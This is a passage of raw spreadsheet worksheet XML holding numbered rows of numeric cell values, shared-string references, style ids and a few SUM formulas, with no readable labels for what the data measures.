      <c r="H2" s="1">
        <v>1.0</v>
      </c>
      <c r="I2" s="1">
        <v>2.0</v>
      </c>
      <c r="J2" s="1">
        <v>1.0</v>
      </c>
      <c r="K2" s="1">
        <v>0.0</v>
      </c>
      <c r="L2" s="1">
        <v>21.0</v>
      </c>
      <c r="M2" s="1">
        <v>21.0</v>
      </c>
      <c r="P2" s="2" t="s">
        <v>1</v>
      </c>
      <c r="Q2" s="21" t="s">
        <v>5</v>
      </c>
      <c r="R2" s="19" t="s">
        <v>6</v>
      </c>
      <c r="S2" s="19" t="s">
        <v>7</v>
      </c>
      <c r="T2" s="19" t="s">
        <v>8</v>
      </c>
      <c r="U2" s="19" t="s">
        <v>9</v>
      </c>
      <c r="V2" s="19" t="s">
        <v>130</v>
      </c>
      <c r="W2" s="19" t="s">
        <v>131</v>
      </c>
      <c r="X2" s="16" t="s">
        <v>132</v>
      </c>
      <c r="Y2" s="17" t="s">
        <v>133</v>
      </c>
      <c r="AA2" s="3" t="s">
        <v>134</v>
      </c>
      <c r="AB2" s="1" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="20">
        <v>2.0</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>43</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E3" s="9">
        <v>2801.0</v>
      </c>
      <c r="F3" s="1">
        <v>123100.0</v>
      </c>
      <c r="G3" s="4">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="H3" s="1">
        <v>2.0</v>
      </c>
      <c r="I3" s="1">
        <v>1.0</v>
      </c>
      <c r="J3" s="1">
        <v>3.0</v>
      </c>
      <c r="K3" s="1">
        <v>0.0</v>
      </c>
      <c r="L3" s="1">
        <v>13.0</v>
      </c>
      <c r="M3" s="1">
        <v>18.0</v>
      </c>
      <c r="O3" s="1">
        <v>1.0</v>
      </c>
      <c r="P3" s="3" t="s">
        <v>41</v>
      </c>
      <c r="Q3" s="22">
        <f t="shared" ref="Q3:Q22" si="2">sum(R3:U3)</f>
        <v>4</v>
      </c>
      <c r="R3" s="23">
        <v>1.0</v>
      </c>
      <c r="S3" s="23">
        <v>2.0</v>
      </c>
      <c r="T3" s="23">
        <v>1.0</v>
      </c>
      <c r="U3" s="23"/>
      <c r="V3" s="19">
        <v>68.0</v>
      </c>
      <c r="W3" s="19">
        <v>371.0</v>
      </c>
      <c r="X3" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y3" s="25">
        <v>13.0</v>
      </c>
      <c r="AA3" s="3" t="s">
        <v>134</v>
      </c>
      <c r="AB3" s="1" t="s">
        <v>137</v>
      </c>
      <c r="AC3" s="26">
        <v>0.115942</v>
      </c>
      <c r="AD3" s="26">
        <v>0.2</v>
      </c>
      <c r="AE3" s="26">
        <v>0.018868</v>
      </c>
      <c r="AF3" s="26">
        <v>0.115942</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="20">
        <v>3.0</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>20</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>21</v>
      </c>
      <c r="E4" s="1">
        <v>319.0</v>
      </c>
      <c r="F4" s="1">
        <v>2115.0</v>
      </c>
      <c r="G4" s="4">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="H4" s="6">
        <v>3.0</v>
      </c>
      <c r="I4" s="6">
        <v>1.0</v>
      </c>
      <c r="J4" s="6">
        <v>2.0</v>
      </c>
      <c r="K4" s="6">
        <v>0.0</v>
      </c>
      <c r="L4" s="1">
        <v>1.0</v>
      </c>
      <c r="M4" s="1">
        <v>4.0</v>
      </c>
      <c r="O4" s="1">
        <v>2.0</v>
      </c>
      <c r="P4" s="3" t="s">
        <v>43</v>
      </c>
      <c r="Q4" s="22">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="R4" s="23">
        <v>2.0</v>
      </c>
      <c r="S4" s="23">
        <v>1.0</v>
      </c>
      <c r="T4" s="23">
        <v>3.0</v>
      </c>
      <c r="U4" s="23"/>
      <c r="V4" s="19">
        <v>814.0</v>
      </c>
      <c r="W4" s="19">
        <v>7469.0</v>
      </c>
      <c r="X4" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y4" s="25">
        <v>21.0</v>
      </c>
      <c r="AA4" s="3" t="s">
        <v>134</v>
      </c>
      <c r="AB4" s="1" t="s">
        <v>138</v>
      </c>
      <c r="AC4" s="26">
        <v>0.130435</v>
      </c>
      <c r="AD4" s="26">
        <v>0.2</v>
      </c>
      <c r="AE4" s="26">
        <v>0.172507</v>
      </c>
      <c r="AF4" s="26">
        <v>0.130435</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="20">
        <v>4.0</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E5" s="1">
        <v>31.0</v>
      </c>
      <c r="F5" s="1">
        <v>512.0</v>
      </c>
      <c r="G5" s="4">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="H5" s="1">
        <v>2.0</v>
      </c>
      <c r="I5" s="1">
        <v>0.0</v>
      </c>
      <c r="J5" s="1">
        <v>6.0</v>
      </c>
      <c r="K5" s="1">
        <v>0.0</v>
      </c>
      <c r="L5" s="1">
        <v>2.0</v>
      </c>
      <c r="M5" s="1">
        <v>8.0</v>
      </c>
      <c r="O5" s="1">
        <v>3.0</v>
      </c>
      <c r="P5" s="3" t="s">
        <v>20</v>
      </c>
      <c r="Q5" s="22">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="R5" s="27">
        <v>3.0</v>
      </c>
      <c r="S5" s="27">
        <v>1.0</v>
      </c>
      <c r="T5" s="27">
        <v>2.0</v>
      </c>
      <c r="U5" s="27"/>
      <c r="V5" s="19">
        <v>173.0</v>
      </c>
      <c r="W5" s="19">
        <v>596.0</v>
      </c>
      <c r="X5" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y5" s="25">
        <v>3.0</v>
      </c>
      <c r="AA5" s="3" t="s">
        <v>134</v>
      </c>
      <c r="AB5" s="1" t="s">
        <v>139</v>
      </c>
      <c r="AC5" s="26">
        <v>0.144928</v>
      </c>
      <c r="AD5" s="26">
        <v>0.6</v>
      </c>
      <c r="AE5" s="26">
        <v>0.026954</v>
      </c>
      <c r="AF5" s="26">
        <v>0.144928</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="20">
        <v>5.0</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>27</v>
      </c>
      <c r="E6" s="1">
        <v>17.0</v>
      </c>
      <c r="F6" s="1">
        <v>385.0</v>
      </c>
      <c r="G6" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="H6" s="1">
        <v>3.0</v>
      </c>
      <c r="I6" s="1">
        <v>0.0</v>
      </c>
      <c r="J6" s="1">
        <v>1.0</v>
      </c>
      <c r="K6" s="1">
        <v>1.0</v>
      </c>
      <c r="L6" s="1">
        <v>10.0</v>
      </c>
      <c r="M6" s="1">
        <v>10.0</v>
      </c>
      <c r="O6" s="1">
        <v>4.0</v>
      </c>
      <c r="P6" s="3" t="s">
        <v>23</v>
      </c>
      <c r="Q6" s="22">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="R6" s="23">
        <v>2.0</v>
      </c>
      <c r="S6" s="23"/>
      <c r="T6" s="23">
        <v>6.0</v>
      </c>
      <c r="U6" s="23"/>
      <c r="V6" s="19">
        <v>36.0</v>
      </c>
      <c r="W6" s="19">
        <v>79.0</v>
      </c>
      <c r="X6" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y6" s="25">
        <v>2.0</v>
      </c>
      <c r="AA6" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB6" s="1" t="s">
        <v>142</v>
      </c>
      <c r="AC6" s="28"/>
      <c r="AD6" s="28"/>
      <c r="AE6" s="28"/>
      <c r="AF6" s="28"/>
    </row>
    <row r="7">
      <c r="A7" s="20">
        <v>6.0</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>29</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="1">
        <v>290.0</v>
      </c>
      <c r="F7" s="1">
        <v>9765.0</v>
      </c>
      <c r="G7" s="4">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="H7" s="1">
        <v>3.0</v>
      </c>
      <c r="I7" s="1">
        <v>2.0</v>
      </c>
      <c r="J7" s="1">
        <v>3.0</v>
      </c>
      <c r="K7" s="1">
        <v>0.0</v>
      </c>
      <c r="L7" s="1">
        <v>2.0</v>
      </c>
      <c r="M7" s="1">
        <v>3.0</v>
      </c>
      <c r="O7" s="1">
        <v>5.0</v>
      </c>
      <c r="P7" s="3" t="s">
        <v>26</v>
      </c>
      <c r="Q7" s="22">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="R7" s="23">
        <v>3.0</v>
      </c>
      <c r="S7" s="23"/>
      <c r="T7" s="23">
        <v>1.0</v>
      </c>
      <c r="U7" s="23">
        <v>1.0</v>
      </c>
      <c r="V7" s="19">
        <v>16.0</v>
      </c>
      <c r="W7" s="19">
        <v>38.0</v>
      </c>
      <c r="X7" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y7" s="25">
        <v>10.0</v>
      </c>
      <c r="AA7" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB7" s="1" t="s">
        <v>143</v>
      </c>
      <c r="AC7" s="28"/>
      <c r="AD7" s="28"/>
      <c r="AE7" s="28"/>
      <c r="AF7" s="28"/>
    </row>
    <row r="8">
      <c r="A8" s="20">
        <v>7.0</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>31</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E8" s="1">
        <v>72328.0</v>
      </c>
      <c r="F8" s="1">
        <v>1162644.0</v>
      </c>
      <c r="G8" s="4">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="H8" s="1">
        <v>2.0</v>
      </c>
      <c r="I8" s="1">
        <v>1.0</v>
      </c>
      <c r="J8" s="1">
        <v>1.0</v>
      </c>
      <c r="K8" s="1">
        <v>0.0</v>
      </c>
      <c r="L8" s="1">
        <v>2.0</v>
      </c>
      <c r="M8" s="1">
        <v>2.0</v>
      </c>
      <c r="O8" s="1">
        <v>6.0</v>
      </c>
      <c r="P8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="Q8" s="22">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="R8" s="23">
        <v>3.0</v>
      </c>
      <c r="S8" s="23">
        <v>2.0</v>
      </c>
      <c r="T8" s="23">
        <v>3.0</v>
      </c>
      <c r="U8" s="23"/>
      <c r="V8" s="19">
        <v>288.0</v>
      </c>
      <c r="W8" s="19">
        <v>349.0</v>
      </c>
      <c r="X8" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y8" s="25">
        <v>2.0</v>
      </c>
      <c r="AA8" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB8" s="1" t="s">
        <v>144</v>
      </c>
      <c r="AC8" s="26">
        <v>0.028221</v>
      </c>
      <c r="AD8" s="26">
        <v>0.785714</v>
      </c>
      <c r="AE8" s="26">
        <v>0.120632</v>
      </c>
      <c r="AF8" s="26">
        <v>0.028221</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="20">
        <v>8.0</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E9" s="1">
        <v>14.0</v>
      </c>
      <c r="F9" s="1">
        <v>23.0</v>
      </c>
      <c r="G9" s="4">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="H9" s="1">
        <v>2.0</v>
      </c>
      <c r="I9" s="1">
        <v>0.0</v>
      </c>
      <c r="J9" s="1">
        <v>2.0</v>
      </c>
      <c r="K9" s="1">
        <v>0.0</v>
      </c>
      <c r="L9" s="1">
        <v>5.0</v>
      </c>
      <c r="M9" s="1">
        <v>6.0</v>
      </c>
      <c r="O9" s="1">
        <v>7.0</v>
      </c>
      <c r="P9" s="3" t="s">
        <v>31</v>
      </c>
      <c r="Q9" s="22">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="R9" s="23">
        <v>2.0</v>
      </c>
      <c r="S9" s="23">
        <v>1.0</v>
      </c>
      <c r="T9" s="23">
        <v>1.0</v>
      </c>
      <c r="U9" s="23"/>
      <c r="V9" s="19">
        <v>72328.0</v>
      </c>
      <c r="W9" s="19">
        <v>144148.0</v>
      </c>
      <c r="X9" s="24"/>
      <c r="Y9" s="25">
        <v>2.0</v>
      </c>
      <c r="AA9" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB9" s="1" t="s">
        <v>145</v>
      </c>
      <c r="AC9" s="26">
        <v>0.035583</v>
      </c>
      <c r="AD9" s="26">
        <v>0.928571</v>
      </c>
      <c r="AE9" s="26">
        <v>0.128933</v>
      </c>
      <c r="AF9" s="26">
        <v>0.035583</v>
      </c>
    </row>
    <row r="10" ht="15.0" customHeight="1">
      <c r="A10" s="1">
        <v>9.0</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>18</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E10" s="1">
        <v>22.0</v>
      </c>
      <c r="F10" s="1">
        <v>1135.0</v>
      </c>
      <c r="G10" s="4">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="H10" s="1">
        <v>1.0</v>
      </c>
      <c r="I10" s="1">
        <v>0.0</v>
      </c>
      <c r="J10" s="1">
        <v>2.0</v>
      </c>
      <c r="K10" s="1">
        <v>0.0</v>
      </c>
      <c r="L10" s="1">
        <v>5.0</v>
      </c>
      <c r="M10" s="1">
        <v>6.0</v>
      </c>
      <c r="O10" s="1">
        <v>8.0</v>
      </c>
      <c r="P10" s="3" t="s">
        <v>35</v>
      </c>
      <c r="Q10" s="22">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="R10" s="23">
        <v>2.0</v>
      </c>
      <c r="S10" s="23"/>
      <c r="T10" s="23">
        <v>2.0</v>
      </c>
      <c r="U10" s="23"/>
      <c r="V10" s="19">
        <v>14.0</v>
      </c>
      <c r="W10" s="19">
        <v>23.0</v>
      </c>
      <c r="X10" s="24"/>
      <c r="Y10" s="25">
        <v>5.0</v>
      </c>
      <c r="AA10" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB10" s="1" t="s">
        <v>146</v>
      </c>
      <c r="AC10" s="26">
        <v>0.02454</v>
      </c>
      <c r="AD10" s="26">
        <v>0.785714</v>
      </c>
      <c r="AE10" s="26">
        <v>6.69E-4</v>
      </c>
      <c r="AF10" s="26">
        <v>0.02454</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1">
        <v>10.0</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E11" s="1">
        <v>48.0</v>
      </c>
      <c r="F11" s="1">
        <v>273.0</v>
      </c>
      <c r="G11" s="4">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="H11" s="1">
        <v>0.0</v>
      </c>
      <c r="I11" s="1">
        <v>0.0</v>
      </c>
      <c r="J11" s="1">
        <v>2.0</v>
      </c>
      <c r="K11" s="1">
        <v>0.0</v>
      </c>
      <c r="L11" s="1">
        <v>4.0</v>
      </c>
      <c r="M11" s="1">
        <v>6.0</v>
      </c>
      <c r="O11" s="1">
        <v>9.0</v>
      </c>
      <c r="P11" s="3" t="s">
        <v>147</v>
      </c>
      <c r="Q11" s="22">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="R11" s="29"/>
      <c r="S11" s="23">
        <v>1.0</v>
      </c>
      <c r="T11" s="23">
        <v>7.0</v>
      </c>
      <c r="U11" s="23"/>
      <c r="V11" s="19">
        <v>26.0</v>
      </c>
      <c r="W11" s="19">
        <v>74.0</v>
      </c>
      <c r="X11" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y11" s="25">
        <v>9.0</v>
      </c>
      <c r="AA11" s="3" t="s">
        <v>141</v>
      </c>
      <c r="AB11" s="1" t="s">
        <v>148</v>
      </c>
      <c r="AC11" s="26">
        <v>0.022086</v>
      </c>
      <c r="AD11" s="28"/>
      <c r="AE11" s="26">
        <v>5.36E-4</v>
      </c>
      <c r="AF11" s="26">
        <v>0.022086</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1">
        <v>11.0</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>33</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E12" s="1">
        <v>9.0</v>
      </c>
      <c r="F12" s="1">
        <v>34.0</v>
      </c>
      <c r="G12" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H12" s="1">
        <v>0.0</v>
      </c>
      <c r="I12" s="1">
        <v>0.0</v>
      </c>
      <c r="J12" s="1">
        <v>0.0</v>
      </c>
      <c r="K12" s="1">
        <v>0.0</v>
      </c>
      <c r="L12" s="1">
        <v>1.0</v>
      </c>
      <c r="M12" s="1">
        <v>2.0</v>
      </c>
      <c r="O12" s="1">
        <v>10.0</v>
      </c>
      <c r="P12" s="3" t="s">
        <v>149</v>
      </c>
      <c r="Q12" s="22">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="R12" s="29"/>
      <c r="S12" s="29"/>
      <c r="T12" s="23">
        <v>3.0</v>
      </c>
      <c r="U12" s="29"/>
      <c r="V12" s="19">
        <v>5.0</v>
      </c>
      <c r="W12" s="19">
        <v>11.0</v>
      </c>
      <c r="X12" s="24"/>
      <c r="Y12" s="25">
        <v>10.0</v>
      </c>
      <c r="AA12" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB12" s="1" t="s">
        <v>150</v>
      </c>
      <c r="AC12" s="28"/>
      <c r="AD12" s="28"/>
      <c r="AE12" s="28"/>
      <c r="AF12" s="28"/>
    </row>
    <row r="13">
      <c r="A13" s="1">
        <v>12.0</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>15</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E13" s="1">
        <v>16.0</v>
      </c>
      <c r="F13" s="1">
        <v>306.0</v>
      </c>
      <c r="G13" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H13" s="1">
        <v>0.0</v>
      </c>
      <c r="I13" s="1">
        <v>0.0</v>
      </c>
      <c r="J13" s="1">
        <v>0.0</v>
      </c>
      <c r="K13" s="1">
        <v>0.0</v>
      </c>
      <c r="L13" s="1">
        <v>5.0</v>
      </c>
      <c r="M13" s="1">
        <v>9.0</v>
      </c>
      <c r="O13" s="1">
        <v>11.0</v>
      </c>
      <c r="P13" s="3" t="s">
        <v>151</v>
      </c>
      <c r="Q13" s="22">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="R13" s="23">
        <v>1.0</v>
      </c>
      <c r="S13" s="29"/>
      <c r="T13" s="23">
        <v>1.0</v>
      </c>
      <c r="U13" s="29"/>
      <c r="V13" s="19">
        <v>296.0</v>
      </c>
      <c r="W13" s="19">
        <v>596.0</v>
      </c>
      <c r="X13" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y13" s="25">
        <v>2.0</v>
      </c>
      <c r="AA13" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB13" s="1" t="s">
        <v>152</v>
      </c>
      <c r="AC13" s="28"/>
      <c r="AD13" s="28"/>
      <c r="AE13" s="28"/>
      <c r="AF13" s="28"/>
    </row>
    <row r="14">
      <c r="A14" s="1">
        <v>13.0</v>
      </c>
      <c r="B14" s="7" t="s">
        <v>17</v>
      </c>
      <c r="C14" s="7" t="s">
        <v>37</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E14" s="1">
        <v>18.0</v>
      </c>
      <c r="F14" s="1">
        <v>75.0</v>
      </c>
      <c r="G14" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H14" s="8">
        <v>0.0</v>
      </c>
      <c r="I14" s="8">
        <v>0.0</v>
      </c>
      <c r="J14" s="8">
        <v>0.0</v>
      </c>
      <c r="K14" s="8">
        <v>0.0</v>
      </c>
      <c r="L14" s="1">
        <v>1.0</v>
      </c>
      <c r="M14" s="1">
        <v>3.0</v>
      </c>
      <c r="O14" s="1">
        <v>12.0</v>
      </c>
      <c r="P14" s="3" t="s">
        <v>153</v>
      </c>
      <c r="Q14" s="22">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="R14" s="29"/>
      <c r="S14" s="29"/>
      <c r="T14" s="23">
        <v>3.0</v>
      </c>
      <c r="U14" s="29"/>
      <c r="V14" s="19">
        <v>17.0</v>
      </c>
      <c r="W14" s="19">
        <v>40.0</v>
      </c>
      <c r="X14" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y14" s="25">
        <v>1.0</v>
      </c>
      <c r="AA14" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB14" s="1" t="s">
        <v>154</v>
      </c>
      <c r="AC14" s="26">
        <v>0.097484</v>
      </c>
      <c r="AD14" s="28"/>
      <c r="AE14" s="28"/>
      <c r="AF14" s="26">
        <v>0.097484</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1">
        <v>14.0</v>
      </c>
      <c r="B15" s="7" t="s">
        <v>17</v>
      </c>
      <c r="C15" s="7" t="s">
        <v>39</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>40</v>
      </c>
      <c r="E15" s="1">
        <v>19.0</v>
      </c>
      <c r="F15" s="1">
        <v>86.0</v>
      </c>
      <c r="G15" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H15" s="1">
        <v>0.0</v>
      </c>
      <c r="I15" s="1">
        <v>0.0</v>
      </c>
      <c r="J15" s="1">
        <v>0.0</v>
      </c>
      <c r="K15" s="1">
        <v>0.0</v>
      </c>
      <c r="L15" s="1">
        <v>5.0</v>
      </c>
      <c r="M15" s="1">
        <v>5.0</v>
      </c>
      <c r="O15" s="1">
        <v>13.0</v>
      </c>
      <c r="P15" s="3" t="s">
        <v>155</v>
      </c>
      <c r="Q15" s="22">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="R15" s="23">
        <v>1.0</v>
      </c>
      <c r="S15" s="29"/>
      <c r="T15" s="23">
        <v>1.0</v>
      </c>
      <c r="U15" s="29"/>
      <c r="V15" s="30">
        <v>533.0</v>
      </c>
      <c r="W15" s="19">
        <v>1436.0</v>
      </c>
      <c r="X15" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y15" s="25">
        <v>4.0</v>
      </c>
      <c r="AA15" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB15" s="1" t="s">
        <v>156</v>
      </c>
      <c r="AC15" s="26">
        <v>0.201258</v>
      </c>
      <c r="AD15" s="28"/>
      <c r="AE15" s="28"/>
      <c r="AF15" s="26">
        <v>0.201258</v>
      </c>
    </row>
    <row r="16">
      <c r="F16" s="1" t="s">
        <v>45</v>
      </c>
      <c r="H16" s="4">
        <f t="shared" ref="H16:K16" si="3">SUM(H2:H15)</f>
        <v>19</v>
      </c>
      <c r="I16" s="4">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="J16" s="4">
        <f t="shared" si="3"/>
        <v>23</v>
      </c>
      <c r="K16" s="4">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O16" s="1">
        <v>14.0</v>
      </c>
      <c r="P16" s="3" t="s">
        <v>157</v>
      </c>
      <c r="Q16" s="22">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="R16" s="29"/>
      <c r="S16" s="29"/>
      <c r="T16" s="23">
        <v>1.0</v>
      </c>
      <c r="U16" s="29"/>
      <c r="V16" s="19">
        <v>49977.0</v>
      </c>
      <c r="W16" s="19">
        <v>58329.0</v>
      </c>
      <c r="X16" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y16" s="25">
        <v>1.0</v>
      </c>
      <c r="AA16" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB16" s="1" t="s">
        <v>158</v>
      </c>
      <c r="AC16" s="26">
        <v>0.22956</v>
      </c>
      <c r="AD16" s="28"/>
      <c r="AE16" s="26">
        <v>0.115772</v>
      </c>
      <c r="AF16" s="26">
        <v>0.22956</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="31"/>
      <c r="B17" s="32"/>
      <c r="C17" s="31"/>
      <c r="D17" s="31"/>
      <c r="E17" s="31"/>
      <c r="F17" s="31"/>
      <c r="G17" s="31"/>
      <c r="H17" s="31"/>
      <c r="I17" s="31"/>
      <c r="J17" s="31"/>
      <c r="K17" s="31"/>
      <c r="L17" s="32"/>
      <c r="M17" s="32"/>
      <c r="N17" s="31"/>
      <c r="O17" s="1">
        <v>15.0</v>
      </c>
      <c r="P17" s="3" t="s">
        <v>159</v>
      </c>
      <c r="Q17" s="22">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="R17" s="23">
        <v>1.0</v>
      </c>
      <c r="S17" s="29"/>
      <c r="T17" s="23">
        <v>1.0</v>
      </c>
      <c r="U17" s="29"/>
      <c r="V17" s="19">
        <v>21.0</v>
      </c>
      <c r="W17" s="19">
        <v>73.0</v>
      </c>
      <c r="X17" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y17" s="25">
        <v>2.0</v>
      </c>
      <c r="AA17" s="3" t="s">
        <v>20</v>
      </c>
      <c r="AB17" s="1" t="s">
        <v>160</v>
      </c>
      <c r="AC17" s="26">
        <v>0.232704</v>
      </c>
      <c r="AD17" s="28"/>
      <c r="AE17" s="26">
        <v>0.122483</v>
      </c>
      <c r="AF17" s="26">
        <v>0.232704</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="31"/>
      <c r="B18" s="32"/>
      <c r="C18" s="31"/>
      <c r="D18" s="31"/>
      <c r="E18" s="31"/>
      <c r="F18" s="31"/>
      <c r="G18" s="31"/>
      <c r="H18" s="31"/>
      <c r="I18" s="31"/>
      <c r="J18" s="31"/>
      <c r="K18" s="31"/>
      <c r="L18" s="32"/>
      <c r="M18" s="32"/>
      <c r="N18" s="31"/>
      <c r="O18" s="1">
        <v>16.0</v>
      </c>
      <c r="P18" s="3" t="s">
        <v>161</v>
      </c>
      <c r="Q18" s="22">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="R18" s="29"/>
      <c r="S18" s="29"/>
      <c r="T18" s="23">
        <v>1.0</v>
      </c>
      <c r="U18" s="29"/>
      <c r="V18" s="19">
        <v>21.0</v>
      </c>
      <c r="W18" s="19">
        <v>73.0</v>
      </c>
      <c r="X18" s="24" t="s">
        <v>140</v>
      </c>
      <c r="Y18" s="25">
        <v>4.0</v>
      </c>
      <c r="AA18" s="3" t="s">
        <v>162</v>
      </c>
      <c r="AB18" s="1" t="s">
        <v>163</v>
      </c>
      <c r="AC18" s="28"/>
      <c r="AD18" s="28"/>
      <c r="AE18" s="28"/>
      <c r="AF18" s="28"/>
    </row>
    <row r="19">
      <c r="A19" s="31"/>
      <c r="B19" s="32"/>
      <c r="C19" s="31"/>
      <c r="D19" s="31"/>
      <c r="E19" s="31"/>
      <c r="F19" s="31"/>
      <c r="G19" s="31"/>
      <c r="H19" s="31"/>
      <c r="I19" s="31"/>
      <c r="J19" s="31"/>
      <c r="K19" s="31"/>
      <c r="L19" s="32"/>
      <c r="M19" s="32"/>
      <c r="N19" s="31"/>
      <c r="O19" s="1">
        <v>17.0</v>
      </c>
      <c r="P19" s="3" t="s">
        <v>164</v>
      </c>
      <c r="Q19" s="22">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="R19" s="23">
        <v>1.0</v>
      </c>
      <c r="S19" s="29"/>
      <c r="T19" s="23">
        <v>2.0</v>
      </c>
      <c r="U19" s="29"/>
      <c r="V19" s="19">
        <v>9.0</v>
      </c>
      <c r="W19" s="19">
        <v>28.0</v>
      </c>
      <c r="X19" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y19" s="25">
        <v>6.0</v>
      </c>
      <c r="AA19" s="3" t="s">
        <v>162</v>
      </c>
      <c r="AB19" s="1" t="s">
        <v>165</v>
      </c>
      <c r="AC19" s="28"/>
      <c r="AD19" s="28"/>
      <c r="AE19" s="28"/>
      <c r="AF19" s="28"/>
    </row>
    <row r="20">
      <c r="A20" s="31"/>
      <c r="B20" s="32"/>
      <c r="C20" s="31"/>
      <c r="D20" s="31"/>
      <c r="E20" s="31"/>
      <c r="F20" s="31"/>
      <c r="G20" s="31"/>
      <c r="H20" s="31"/>
      <c r="I20" s="31"/>
      <c r="J20" s="31"/>
      <c r="K20" s="31"/>
      <c r="L20" s="32"/>
